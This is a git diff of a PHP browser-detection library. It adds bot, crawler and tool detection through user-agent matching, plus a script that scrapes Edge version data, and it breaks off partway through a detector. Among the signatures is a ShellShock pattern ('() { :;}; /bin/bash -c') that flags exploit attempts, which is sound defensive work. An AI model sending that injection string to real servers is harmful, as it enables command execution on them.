diff --git a/.gitattributes b/.gitattributes index 5b67882..b8faf42 100644 --- a/.gitattributes +++ b/.gitattributes @@ -12,3 +12,4 @@ /phpunit.xml.dist export-ignore /README.md export-ignore /ruleset.xml export-ignore +/scripts export-ignore diff --git a/.gitignore b/.gitignore index 81b9258..86d9b11 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,4 @@ composer.lock phpunit.xml vendor +.idea \ No newline at end of file diff --git a/CHANGELOG.md b/CHANGELOG.md index bb0199d..314c589 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,5 +1,9 @@ # CHANGELOG +## 7.0.0 (released 2017-xx-xx) + +- ... + ## 6.1.2 (released 2016-12-28) - Added wkhtmltopdf detection diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 0ca2ed1..c80e864 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -10,7 +10,6 @@ Contributions are welcome, and are accepted via pull requests. Please review the * Send a coherent commit history, making sure each individual commit in your pull request is meaningful. If you had to make multiple intermediate commits while developing, please [squash](http://git-scm.com/book/en/Git-Tools-Rewriting-History) them before submitting. * You may also need to [rebase](http://git-scm.com/book/en/Git-Branching-Rebasing) to avoid merge conflicts. - ## Running Tests You will need an install of [Composer](https://getcomposer.org) before continuing. diff --git a/LICENSE b/LICENSE index dfe9a79..4be9f19 100644 --- a/LICENSE +++ b/LICENSE @@ -1,6 +1,6 @@ The MIT License (MIT) -Copyright (c) 2013-2017 Chris Schuld +Copyright (c) 2013-present Chris Schuld Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in diff --git a/README.md b/README.md index cee8a05..0050a5d 100644 --- a/README.md +++ b/README.md @@ -51,16 +51,13 @@ The Browser class allows you to detect a user's browser and version. * Lynx * Safari * Chrome - * Navigator - * GoogleBot - * Yahoo! Slurp - * W3C Validator + * Android Navigator + * UC Browser * BlackBerry * IceCat * Nokia S60 OSS Browser * Nokia Browser * MSN Browser - * MSN Bot * Netscape Navigator * Galeon * NetPositive @@ -69,14 +66,16 @@ The Browser class allows you to detect a user's browser and version. * Yandex Browser * Comodo Dragon * Samsung Browser - * wkhtmltopdf ### Usage ```php use Sinergi\BrowserDetector\Browser; -$browser = new Browser(); +$browser = new Browser(); + +//You can also provide a userAgent string if you don't wish to detect the current browser +//$browser = new Browser("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"); if ($browser->getName() === Browser::IE && $browser->getVersion() < 11) { echo 'Please upgrade your browser.'; @@ -97,6 +96,92 @@ if ($browser->getName() === Browser::IE && $browser->isCompatibilityMode()) { } ``` +## Scripted Agent Detection + +The ScriptedAgent class allows you to detect scripted agents (bots, spiders, tools) + +### Scripted Agents Detected + +Spiders + + * GoogleBot + * Baidu + * Bing + * MSN + * Yahoo! Slurp + * W3C Spiders + * Yandex + * Apple + * Paper.li + * Majestic12 + * Livelap + * Scoop.it + * Who.is + * Proximic + +Web Surveys + + * Ahrefs + * MetaURI + * Netcraft + * Browsershots + * MageReport + * SocialRank.io + * Gluten Free + * Ubermetrics + * Verisign IPS-Agent + +Exploits + + * ShellShock + +Web Preview bots + + * ICQ + * Google Web + * Facebook + * Bing + * Twitter + * Skype + +Tools + + * wkHTMLtoPDF + * W3C Validator + * WebDAV + * TLSProbe + * Wget + * Zgrab + +Generic + + * Google Favicon + * Curl + * Python + * GoLang + * Perl + * Java + +Ad bots + + * Google + * Microsoft + * AdBeat + +### Usage + +```php +use Sinergi\BrowserDetector\Browser; + +$browser = new Browser(); + +$scriptedAgent = $browser->detectScriptedAgent(); +if ($scriptedAgent!==false) +{ + die("Detected ".$scriptedAgent->getName()." which is a ".$scriptedAgent->getType().". Info: ".$scriptedAgent->getInfoURL()); +} +``` + ## OS Detection The OS class allows you to detect a user's operating system and version. diff --git a/scripts/fetchEdgeVersions/ChangeWindows.php b/scripts/fetchEdgeVersions/ChangeWindows.php new file mode 100644 index 0000000..864e592 --- /dev/null +++ b/scripts/fetchEdgeVersions/ChangeWindows.php @@ -0,0 +1,156 @@ + 'Could not fetch current version from ChangeWindows', + 'invalid_version' => 'Windows version is invalid', + 'could_not_fetch_page' => 'Could not fetch page from ChangeWindows' + ); + + public static function fetchVersions() + { + $windowsVersions = json_decode(file_get_contents(__DIR__ . '/windowsVersions.json'), true); + if (!count($windowsVersions)) { + $currentVersion = explode('.', self::fetchCurrentVersion(), 2); + if (!isset($currentVersion[0])) { + throw new Exception(self::$errors['invalid_version']); + } + $windowsVersions = self::fetchVersion($windowsVersions, $currentVersion[0]); + self::writeWindowsVersions($windowsVersions); + } else { + reset($windowsVersions); + $firstVersion = key($windowsVersions); + end($windowsVersions); + $lastVersion = key($windowsVersions); + + try { + $result = self::fetchVersion($windowsVersions, $firstVersion); + $windowsVersions = $result; + } catch (Exception $e) { + } + + $windowsVersions = self::fetchVersion($windowsVersions, $lastVersion); + self::writeWindowsVersions($windowsVersions); + } + } + + private static function fetchVersion($windowsVersions, $version) + { + $siblingVersions = self::fetchPage($version); + $windowsVersions[$version] = true; + self::writeWindowsVersions($windowsVersions); + + if (isset($siblingVersions[0]) && !isset($windowsVersions[$siblingVersions[0]])) { + $windowsVersions = self::fetchVersion($windowsVersions, $siblingVersions[0]); + } + + if (isset($siblingVersions[1]) && !isset($windowsVersions[$siblingVersions[1]])) { + $windowsVersions = self::fetchVersion($windowsVersions, $siblingVersions[1]); + } + + return $windowsVersions; + } + + private static function writeWindowsVersions($windowsVersions) + { + ksort($windowsVersions); + file_put_contents(__DIR__ . '/windowsVersions.json', json_encode($windowsVersions, JSON_PRETTY_PRINT)); + } + + private static function fetchCurrentVersion() + { + $content = file_get_contents('https://changewindows.org/filter/pc/all/current/month/true'); + if (!$content) { + throw new Exception(self::$errors['could_not_fetch_version']); + } + $content = explode('class="timeline"', $content, 2); + if (!isset($content[1])) { + throw new Exception(self::$errors['could_not_fetch_version']); + } + $content = explode('build"', $content[1], 2); + if (!isset($content[1])) { + throw new Exception(self::$errors['could_not_fetch_version']); + } + preg_match("/(\d*\.\d*)<\/div>/", $content[1], $matches); + if (!isset($matches[1])) { + throw new Exception(self::$errors['could_not_fetch_version']); + } + return $matches[1]; + } + + private static function fetchPage($version) + { + $url = "https://changewindows.org/build/{$version}/pc"; + $content = file_get_contents($url); + $siblingVersions = self::fetchSiblingVersions($content); + self::fetchEdgeVersion($content); + return $siblingVersions; + } + + private static function fetchEdgeVersion($content) + { + preg_match('/]*> *Edge ([\d\.]*) *<\/h4>/', $content, $edge); + preg_match('/]*>EdgeHTML ([\d\.]*)<\/h4>/', $content, $edgeHtml); + + if (isset($edge[1]) && isset($edgeHtml[1])) { + self::writeEdgeVersion($edgeHtml[1], $edge[1]); + } + return null; + } + + private static function writeEdgeVersion($edgeHtml, $edge) + { + $file = __DIR__ . '/../../src/edgeVersionMap.php'; + $currentVersions = require $file; + if (!isset($currentVersions[$edgeHtml])) { + $currentVersions[$edgeHtml] = $edge; + ksort($currentVersions); + $content = ''; + foreach ($currentVersions as $edgeHtml => $edge) { + $content .= " '{$edgeHtml}' => '{$edge}'," . PHP_EOL; + } + $data = << *(\d+) *name = (string)$name; - return $this; } @@ -132,7 +131,6 @@ public function getName() * Check to see if the specific browser is valid. * * @param string $name - * * @return bool */ public function isBrowser($name) @@ -144,13 +142,11 @@ public function isBrowser($name) * Set the version of the browser. * * @param string $version - * * @return $this */ public function setVersion($version) { $this->version = (string)$version; - return $this; } @@ -169,50 +165,102 @@ public function getVersion() } /** - * Set the Browser to be a robot. - * - * @param bool $isRobot + * Detects scripted agents (robots / bots) + * Returns a resolved ScriptedAgent object if detected. + * Otherwise returns false. * - * @return $this + * @return ScriptedAgent|bool */ - public function setIsRobot($isRobot) + public function detectScriptedAgent() { - $this->isRobot = (bool)$isRobot; + $ua = $this->getUserAgent()->getUserAgentString(); + if (stripos($ua, 'bot') !== false || + stripos($ua, 'spider') !== false || + stripos($ua, 'crawler') !== false || + stripos($ua, 'preview') !== false || + stripos($ua, 'slurp') !== false || + stripos($ua, 'facebookexternalhit') !== false || + stripos($ua, 'mediapartners') !== false || + stripos($ua, 'google-adwords') !== false || + stripos($ua, 'adxvastfetcher') !== false || + stripos($ua, 'adbeat') !== false || + stripos($ua, 'google favicon') !== false || + stripos($ua, 'webdav client') !== false || + stripos($ua, 'metauri api') !== false || + stripos($ua, 'tlsprobe') !== false || + stripos($ua, 'wpif') !== false || + stripos($ua, 'imgsizer') !== false || + stripos($ua, 'netcraft ssl server survey') !== false || + stripos($ua, 'curl/') !== false || + stripos($ua, 'go-http-client/') !== false || + stripos($ua, 'python') !== false || + stripos($ua, 'libwww') !== false || + stripos($ua, 'wget/') !== false || + stripos($ua, 'zgrab/') !== false || + stripos($ua, 'Java/') !== false || + stripos($ua, '() { :;}; /bin/bash -c') !== false || + stripos($ua, 'browsershots') !== false || + stripos($ua, 'magereport') !== false || + stripos($ua, 'ubermetrics-technologies') !== false || + stripos($ua, 'W3C') !== false || + stripos($ua, 'Validator') !== false || + stripos($ua, 'Jigsaw/') !== false || + stripos($ua, 'bing') !== false || + stripos($ua, 'msn') !== false || + stripos($ua, 'Google Web Preview') !== false || + stripos($ua, 'ips-agent') !== false || + (stripos($ua, 'Chrome/51.0.2704.103') !== false && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== false) //ICQ Preview + ) { + $scriptedAgent = new ScriptedAgent($ua); + if ($scriptedAgent->getName()==ScriptedAgent::UNKNOWN) { + return false; + } else { + return $scriptedAgent; + } + } else { + return false; + } + } + /** + * @param bool $isChromeFrame + * @return $this + */ + public function setIsChromeFrame($isChromeFrame) + { + $this->isChromeFrame = (bool)$isChromeFrame; return $this; } /** - * Is the browser from a robot (ex Slurp,GoogleBot)? + * Used to determine if the browser is actually "chromeframe". * * @return bool */ - public function getIsRobot() + public function getIsChromeFrame() { if (!isset($this->name)) { BrowserDetector::detect($this, $this->getUserAgent()); } - return $this->isRobot; + return $this->isChromeFrame; } /** * @return bool */ - public function isRobot() + public function isChromeFrame() { - return $this->getIsRobot(); + return $this->getIsChromeFrame(); } /** - * @param bool $isChromeFrame - * + * @param bool $isWebkit * @return $this */ - public function setIsChromeFrame($isChromeFrame) + public function setIsWebkit($isWebkit) { - $this->isChromeFrame = (bool)$isChromeFrame; - + $this->isWebkit = (bool)$isWebkit; return $this; } @@ -221,32 +269,30 @@ public function setIsChromeFrame($isChromeFrame) * * @return bool */ - public function getIsChromeFrame() + public function getIsWebkit() { if (!isset($this->name)) { BrowserDetector::detect($this, $this->getUserAgent()); } - return $this->isChromeFrame; + return $this->isWebkit; } /** * @return bool */ - public function isChromeFrame() + public function isWebkit() { - return $this->getIsChromeFrame(); + return $this->getIsWebkit(); } /** * @param bool $isFacebookWebView - * * @return $this */ public function setIsFacebookWebView($isFacebookWebView) { $this->isFacebookWebView = (bool) $isFacebookWebView; - return $this; } @@ -273,14 +319,44 @@ public function isFacebookWebView() } /** - * @param UserAgent $userAgent + * @param bool $isTwitterWebView + * @return $this + */ + public function setIsTwitterWebView($isTwitterWebView) + { + $this->isTwitterWebView = (bool) $isTwitterWebView; + return $this; + } + + /** + * Used to determine if the browser is actually "Twitter". * + * @return bool + */ + public function getIsTwitterWebView() + { + if (!isset($this->name)) { + BrowserDetector::detect($this, $this->getUserAgent()); + } + + return $this->isTwitterWebView; + } + + /** + * @return bool + */ + public function isTwitterWebView() + { + return $this->getIsTwitterWebView(); + } + + /** + * @param UserAgent $userAgent * @return $this */ public function setUserAgent(UserAgent $userAgent) { $this->userAgent = $userAgent; - return $this; } @@ -300,7 +376,6 @@ public function getUserAgent() public function setIsCompatibilityMode($isCompatibilityMode) { $this->isCompatibilityMode = $isCompatibilityMode; - return $this; } diff --git a/src/BrowserDetector.php b/src/BrowserDetector.php index 5156188..4b01f79 100644 --- a/src/BrowserDetector.php +++ b/src/BrowserDetector.php @@ -7,6 +7,7 @@ class BrowserDetector implements DetectorInterface const FUNC_PREFIX = 'checkBrowser'; protected static $userAgentString; + protected static $edgeVersionsMap = null; /** * @var Browser @@ -46,16 +47,14 @@ class BrowserDetector implements DetectorInterface 'Samsung', 'Chrome', 'OmniWeb', + 'UCBrowser', //before Android // common mobile 'Android', 'BlackBerry', 'Nokia', 'Gsa', - // common bots - 'Robot', - // wkhtmltopdf before Safari - 'Wkhtmltopdf', // WebKit base check (post mobile and others) + 'AppleNews', 'Safari', // everyone else 'NetPositive', @@ -65,12 +64,23 @@ class BrowserDetector implements DetectorInterface 'Phoenix', 'Amaya', 'Lynx', + 'NSPlayer', + 'Office', 'Shiretoko', 'IceCat', 'Iceweasel', 'Mozilla', /* Mozilla is such an open standard that you must check it last */ ); + /** + * @return array + */ + public static function getEdgeVersionsMap() + { + if (self::$edgeVersionsMap) return self::$edgeVersionsMap; + return self::$edgeVersionsMap = require __DIR__ . '/edgeVersionMap.php'; + } + /** * Routine to determine the browser type. * @@ -92,6 +102,8 @@ public static function detect(Browser $browser, UserAgent $userAgent = null) self::checkChromeFrame(); self::checkFacebookWebView(); + self::checkTwitterWebView(); + self::checkWebkit(); foreach (self::$browsersList as $browserName) { $funcName = self::FUNC_PREFIX . $browserName; @@ -120,6 +132,22 @@ public static function checkChromeFrame() return false; } + /** + * Determine if the browser is a wekit webview. + * + * @return bool + */ + public static function checkWebkit() + { + if (strpos(self::$userAgentString, 'AppleWebKit/') !== false) { + self::$browser->setIsWebkit(true); + + return true; + } + + return false; + } + /** * Determine if the user is using Facebook. * @@ -136,6 +164,22 @@ public static function checkFacebookWebView() return false; } + /** + * Determine if the user is using Twitter. + * + * @return bool + */ + public static function checkTwitterWebView() + { + if (strpos(self::$userAgentString, 'Twitter for') !== false) { + self::$browser->setIsTwitterWebView(true); + + return true; + } + + return false; + } + /** * Determine if the user is using a BlackBerry. * @@ -173,25 +217,6 @@ public static function checkBrowserBlackBerry() return false; } - /** - * Determine if the browser is a robot. - * - * @return bool - */ - public static function checkBrowserRobot() - { - if (stripos(self::$userAgentString, 'bot') !== false || - stripos(self::$userAgentString, 'spider') !== false || - stripos(self::$userAgentString, 'crawler') !== false - ) { - self::$browser->setIsRobot(true); - - return true; - } - - return false; - } - /** * Determine if the browser is Internet Explorer. * @@ -456,11 +481,16 @@ public static function checkBrowserVivaldi() public static function checkBrowserEdge() { if (stripos(self::$userAgentString, 'Edge') !== false) { - $version = explode('Edge/', self::$userAgentString); - if (isset($version[1])) { - self::$browser->setVersion((float)$version[1]); - } self::$browser->setName(Browser::EDGE); + preg_match('/Edge[\\/ \\(]([a-zA-Z\\d\\.]*)/i', self::$userAgentString, $matches); + if (sizeof($matches)>1) { + // todo: implement edge html version + $edgeVersionsMap = self::getEdgeVersionsMap(); + // todo: match versions in between + if (isset($edgeVersionsMap[$matches[1]])) { + self::$browser->setVersion($edgeVersionsMap[$matches[1]]); + } + } return true; } @@ -731,7 +761,7 @@ public static function checkBrowserIceCat() */ public static function checkBrowserNokia() { - if (preg_match("/Nokia([^\/]+)\/([^ SP]+)/i", self::$userAgentString, $matches)) { + if (preg_match("/Nokia([^\\/]+)\\/([^ SP]+)/i", self::$userAgentString, $matches)) { self::$browser->setVersion($matches[2]); if (stripos(self::$userAgentString, 'Series60') !== false || strpos(self::$userAgentString, 'S60') !== false @@ -755,7 +785,7 @@ public static function checkBrowserNokia() public static function checkBrowserFirefox() { if (stripos(self::$userAgentString, 'safari') === false) { - if (preg_match("/Firefox[\/ \(]([^ ;\)]+)/i", self::$userAgentString, $matches)) { + if (preg_match("/Firefox[\\/ \\(]([a-zA-Z\\d\\.]*)/i", self::$userAgentString, $matches)) { if (isset($matches[1])) { self::$browser->setVersion($matches[1]); } @@ -781,7 +811,7 @@ public static function checkBrowserFirefox() public static function checkBrowserSeaMonkey() { if (stripos(self::$userAgentString, 'safari') === false) { - if (preg_match("/SeaMonkey[\/ \(]([^ ;\)]+)/i", self::$userAgentString, $matches)) { + if (preg_match("/SeaMonkey[\\/ \\(]([a-zA-Z\\d\\.]*)/i", self::$userAgentString, $matches)) { if (isset($matches[1])) { self::$browser->setVersion($matches[1]); } @@ -901,20 +931,7 @@ public static function checkBrowserAmaya() return false; } - /** - * Determine if the browser is Safari. - * - * @return bool - */ - public static function checkBrowserWkhtmltopdf() - { - if (stripos(self::$userAgentString, 'wkhtmltopdf') !== false) { - self::$browser->setName(Browser::WKHTMLTOPDF); - return true; - } - return false; - } /** * Determine if the browser is Safari. * @@ -958,7 +975,7 @@ public static function checkBrowserYandex() return false; } - + /** * Determine if the browser is Comodo Dragon / Ice Dragon / Chromodo. * @@ -987,7 +1004,7 @@ public static function checkBrowserDragon() */ public static function checkBrowserAndroid() { - // Navigator + // Android Navigator if (stripos(self::$userAgentString, 'Android') !== false) { if (preg_match('/Version\/([\d\.]*)/i', self::$userAgentString, $matches)) { if (isset($matches[1])) { @@ -1001,6 +1018,104 @@ public static function checkBrowserAndroid() return true; } + // Dalvik (Android OS) + if (stripos(self::$userAgentString, 'Dalvik/') !== false) { + $aresult = explode('/', stristr(self::$userAgentString, 'Dalvik')); + if (isset($aresult[1])) { + $aversion = explode(' ', $aresult[1]); + self::$browser->setVersion($aversion[0]); + } + self::$browser->setName(Browser::DALVIK); + + return true; + } + + return false; + } + + /** + * Determine if the browser is UCBrowser. + * + * @return bool + */ + public static function checkBrowserUCBrowser() + { + // Navigator + if (stripos(self::$userAgentString, 'UCBrowser/') !== false) { + $aresult = explode('/', stristr(self::$userAgentString, 'UCBrowser')); + if (isset($aresult[1])) { + $aversion = explode(' ', $aresult[1]); + self::$browser->setVersion($aversion[0]); + } + self::$browser->setName(Browser::UCBROWSER); + + return true; + } + + return false; + } + + /** + * Determine if the browser is Windows Media Player. + * + * @return bool + */ + public static function checkBrowserNSPlayer() + { + // Navigator + if (stripos(self::$userAgentString, 'NSPlayer/') !== false) { + $aresult = explode('/', stristr(self::$userAgentString, 'NSPlayer')); + if (isset($aresult[1])) { + $aversion = explode(' ', $aresult[1]); + self::$browser->setVersion($aversion[0]); + } + self::$browser->setName(Browser::NSPLAYER); + + return true; + } + + return false; + } + + /** + * Determine if the browser is Microsoft Office. + * + * @return bool + */ + public static function checkBrowserOffice() + { + // Navigator + if (stripos(self::$userAgentString, 'Microsoft Office') !== false) { + self::$browser->setVersion(Browser::VERSION_UNKNOWN); + self::$browser->setName(Browser::NSPLAYER); + + return true; + } + + return false; + } + + /** + * Determine if the browser is the Apple News app. + * + * @return bool + */ + public static function checkBrowserAppleNews() + { + // Navigator + if (stripos(self::$userAgentString, 'AppleNews/') !== false) { + if (preg_match('/Version\/([\d\.]*)/i', self::$userAgentString, $matches)) { + if (isset($matches[1])) { + self::$browser->setVersion($matches[1]); + } + } else { + self::$browser->setVersion(Browser::VERSION_UNKNOWN); + } + self::$browser->setName(Browser::APPLE_NEWS); + + return true; + } + return false; } } diff --git a/src/OsDetector.php b/src/OsDetector.php index 40b0611..8510e90 100644 --- a/src/OsDetector.php +++ b/src/OsDetector.php @@ -209,6 +209,11 @@ private static function checkWindows(Os $os, UserAgent $userAgent) return true; } + if (stripos($userAgent->getUserAgentString(), 'NSPlayer/') !== false) { + $os->setName(Os::WINDOWS); + $os->setVersion(Os::VERSION_UNKNOWN); + return true; + } return false; } diff --git a/src/ScriptedAgent.php b/src/ScriptedAgent.php new file mode 100644 index 0000000..90aef4d --- /dev/null +++ b/src/ScriptedAgent.php @@ -0,0 +1,185 @@ +setUserAgent($userAgent); + } elseif (null === $userAgent || is_string($userAgent)) { + $this->setUserAgent(new UserAgent($userAgent)); + } else { + throw new InvalidArgumentException(); + } + } + + /** + * Set the name of the ScriptedAgent. + * + * @param string $name + * + * @return void + */ + public function setName($name) + { + $this->name = (string)$name; + } + + /** + * Return the name of the ScriptedAgent. + * + * @return string + */ + public function getName() + { + if (!isset($this->name)) { + ScriptedAgentDetector::detect($this, $this->getUserAgent()); + } + + return $this->name; + } + + /** + * Set the type of the ScriptedAgent. + * + * @param string $type + * + * @return void + */ + public function setType($type) + { + $this->type = (string)$type; + } + + /** + * Return the type of the ScriptedAgent. + * + * @return string + */ + public function getType() + { + if (!isset($this->type)) { + ScriptedAgentDetector::detect($this, $this->getUserAgent()); + } + + return $this->type; + } + + /** + * Set the info URL for the ScriptedAgent. + * + * @param string $url + * + * @return void + */ + public function setInfoURL($url) + { + $this->url = (string)$url; + } + + /** + * Return the info URL for the ScriptedAgent. + * + * @return string + */ + public function getInfoURL() + { + if (!isset($this->url)) { + ScriptedAgentDetector::detect($this, $this->getUserAgent()); + } + return $this->url; + } + + /** + * @param UserAgent $userAgent + * + * @return void + */ + public function setUserAgent(UserAgent $userAgent) + { + $this->userAgent = $userAgent; + } + + /** + * @return UserAgent + */ + public function getUserAgent() + { + return $this->userAgent; + } +} diff --git a/src/ScriptedAgentDetector.php b/src/ScriptedAgentDetector.php new file mode 100644 index 0000000..220c3d6 --- /dev/null +++ b/src/ScriptedAgentDetector.php @@ -0,0 +1,755 @@ +getUserAgent(); + } + self::$userAgentString = $userAgent->getUserAgentString(); + + self::$scriptedAgent->setName(ScriptedAgent::UNKNOWN); + self::$scriptedAgent->setType(ScriptedAgent::UNKNOWN); + self::$scriptedAgent->setInfoURL(ScriptedAgent::UNKNOWN); + + foreach (self::$robotsList as $robotName) { + $funcName = self::FUNC_PREFIX . $robotName; + + if (self::$funcName()) { + return true; + } + } + + return false; + } + + /** + * Determine if the browser is wkHTMLtoPDF + * + * @return bool + */ + public static function checkRobotwkHTMLtoPDF() + { + if (stripos(self::$userAgentString, 'wkhtmltopdf') !== false) { + self::$scriptedAgent->setName(ScriptedAgent::WKHTMLTOPDF); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://wkhtmltopdf.org/"); + return true; + } + return false; + } + + /** + * Determine if the browser is the ICQ preview. + * + * @return bool + */ + public static function checkRobotICQ() + { + //Chrome 51 always provides the Upgrade-Insecure-Requests header. ICQ does not. + //But to be extra safe, also check for the russian language which the ICQ bot sets. + if (stripos(self::$userAgentString, 'Chrome/51.0.2704.103') !== false && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::ICQ); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://icq.com"); + return true; + } + return false; + } + + /** + * Determine if the agent is GoogleBot, or a google ads bot. + * + * @return bool + */ + public static function checkRobotGoogle() + { + if (stripos(self::$userAgentString, "Googlebot") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEBOT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); + return true; + } + if (stripos(self::$userAgentString, "AdsBot-Google") !== false + || stripos(self::$userAgentString, "Mediapartners-Google") !== false + || stripos(self::$userAgentString, "Google-Adwords") !== false + || stripos(self::$userAgentString, "AdXVastFetcher-Google") !== false + ) { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEADS); + self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); + self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); + return true; + } + if (stripos(self::$userAgentString, "Google Favicon") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEFAVICON); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4626518.htm"); + return true; + } + if (stripos(self::$userAgentString, "Google Web Preview") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEPREVIEW); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://www.distilnetworks.com/bot-directory/bot/google-web-preview/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Baidu spider. + * + * @return bool + */ + public static function checkRobotBaidu() + { + if (stripos(self::$userAgentString, "Baiduspider") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::BAIDU); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Facebook preview bot. + * + * @return bool + */ + public static function checkRobotFacebook() + { + if (stripos(self::$userAgentString, "facebookexternalhit") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::FACEBOOK); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://www.facebook.com/externalhit_uatext.php"); + return true; + } + return false; + } + + /** + * Determine if the agent is the bing spider, bing preview bot, or MSN bot + * + * @return bool + */ + public static function checkRobotBing() + { + if (stripos(self::$userAgentString, "adidxbot/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::BING); + self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + return true; + } + if (stripos(self::$userAgentString, "/bingbot.htm") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::BING); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + return true; + } + if (stripos(self::$userAgentString, "/msnbot.htm") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::MSNBOT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + return true; + } + if (stripos(self::$userAgentString, "BingPreview/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::BING_PREVIEW); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Yahoo Slurp! Spider. + * + * @return bool + * + */ + public static function checkRobotSlurp() + { + if (stripos(self::$userAgentString, "Yahoo! Slurp") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::SLURP); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://help.yahoo.com/kb/SLN22600.html"); + return true; + } + return false; + } + + /** + * Determine if the agent is the twitter preview bot. + * + * @return bool + */ + public static function checkRobotTwitter() + { + if (stripos(self::$userAgentString, "Twitterbot/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::TWITTER); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("http://stackoverflow.com/questions/22362215/twitter-user-agent-on-sharing"); + return true; + } + return false; + } + + /** + * Determine if the agent is the skype preview bot. + * + * @return bool + */ + public static function checkRobotSkype() + { + if (stripos(self::$userAgentString, "SkypeUriPreview") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::SKYPE); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("http://www.skype.com"); + return true; + } + return false; + } + + /** + * Determine if the agent is the W3C Validator tool. + * + * @return bool + */ + public static function checkRobotW3CValidator() + { + if (stripos(self::$userAgentString, "W3C_Validator/") !== false || + stripos(self::$userAgentString, "Validator.nu/") !== false || + stripos(self::$userAgentString, "W3C-mobileOK/DDC-") !== false || + stripos(self::$userAgentString, "W3C_I18n-Checker/") !== false || + stripos(self::$userAgentString, "FeedValidator/") !== false || + stripos(self::$userAgentString, "Jigsaw/") !== false || + stripos(self::$userAgentString, "JW3C_Unicorn/") !== false + ) { + self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); + return true; + } + if (stripos(self::$userAgentString, "NING/") !== false || + stripos(self::$userAgentString, "W3C-checklink") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Yandex spider. + * + * @return bool + */ + public static function checkRobotYandex() + { + if (stripos(self::$userAgentString, "YandexBot/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::YANDEX); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://yandex.com/bots"); + return true; + } + return false; + } + + /** + * Determine if the agent is the AppleBot + * + * @return bool + */ + public static function checkRobotApple() + { + if (stripos(self::$userAgentString, "AppleBot/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::APPLEBOT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.apple.com/en-gb/HT204683"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Paper.li bot. + * + * @return bool + */ + public static function checkRobotPaperli() + { + if (stripos(self::$userAgentString, "PaperLiBot/") !== false) { + self::$scriptedAgent->setName(ScriptedAgent::PAPERLI); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.paper.li/hc/en-us/articles/204105253-What-is-Paper-li-"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Ahrefs survey. + * + * @return bool + */ + public static function checkRobotAhrefs() + { + if (stripos(self::$userAgentString, "AhrefsBot/") !== false) { + 